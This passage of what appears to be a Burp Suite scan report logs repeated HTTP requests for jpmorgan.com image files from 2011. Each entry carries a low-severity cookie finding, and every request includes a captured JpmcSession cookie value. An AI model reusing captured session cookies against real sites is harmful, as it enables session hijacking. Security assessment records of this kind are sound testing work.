ETag: "42d4c-2aa-698e73c0"
Accept-Ranges: bytes
Content-Length: 682
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4e-134-698e73c0"
Accept-Ranges: bytes
Content-Length: 308
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4f-133-698e73c0"
Accept-Ranges: bytes
Content-Length: 307
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d51-1fa-698e73c0"
Accept-Ranges: bytes
Content-Length: 506
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/loading.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d52-703-698e73c0"
Accept-Ranges: bytes
Content-Length: 1795
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d55-23c-698e73c0"
Accept-Ranges: bytes
Content-Length: 572
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/topclose.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d56-2ac-698e73c0"
Accept-Ranges: bytes
Content-Length: 684
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/logo_jpm_2008.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "72ab3-869-9a51d180"
Accept-Ranges: bytes
Content-Length: 2153
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/logo_jpm_2008_bw.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Tue, 29 Jul 2008 12:47:20 GMT
ETag: "72ab4-884-a650600"
Accept-Ranges: bytes
Content-Length: 2180
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/more_services_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:16 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
ETag: "72abd-63-90c3a200"
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_leftcorner.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "72ab2-63-9a51d180"
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_map.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
ETag: "72abc-f3-90c3a200"
Accept-Ranges: bytes
Content-Length: 243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/navbar_rightcorner2.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Fri, 28 Aug 2009 21:36:39 GMT
ETag: "2e411-5a-7ab207c0"
Accept-Ranges: bytes
Content-Length: 90
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/news_buttons.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 00:08:28 GMT
ETag: "2e609-945-fac3f700"
Accept-Ranges: bytes
Content-Length: 2373
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/news_gradient_cell.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Thu, 04 Dec 2008 23:30:19 GMT
ETag: "2e60a-13c-f191d8c0"
Accept-Ranges: bytes
Content-Length: 316
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_am_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:15 GMT
ETag: "18844-af5-fc1b6bc0"
Accept-Ranges: bytes
Content-Length: 2805
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_cb_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:57 GMT
ETag: "18845-822-fe9c4a40"
Accept-Ranges: bytes
Content-Length: 2082
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_ib_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:06 GMT ETag: "18846-927-ff259e80" Accept-Ranges: bytes Content-Length: 2343 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_pb_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:40 GMT ETag: "18847-82d-12c6b00" Accept-Ranges: bytes Content-Length: 2093 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_ts_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 13:59:50 GMT ETag: "18848-76d-1c50180" Accept-Ranges: bytes Content-Length: 1901 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/thumb_wss_62.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:00:30 GMT ETag: "18849-95b-4275b80" Accept-Ranges: bytes Content-Length: 2395 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
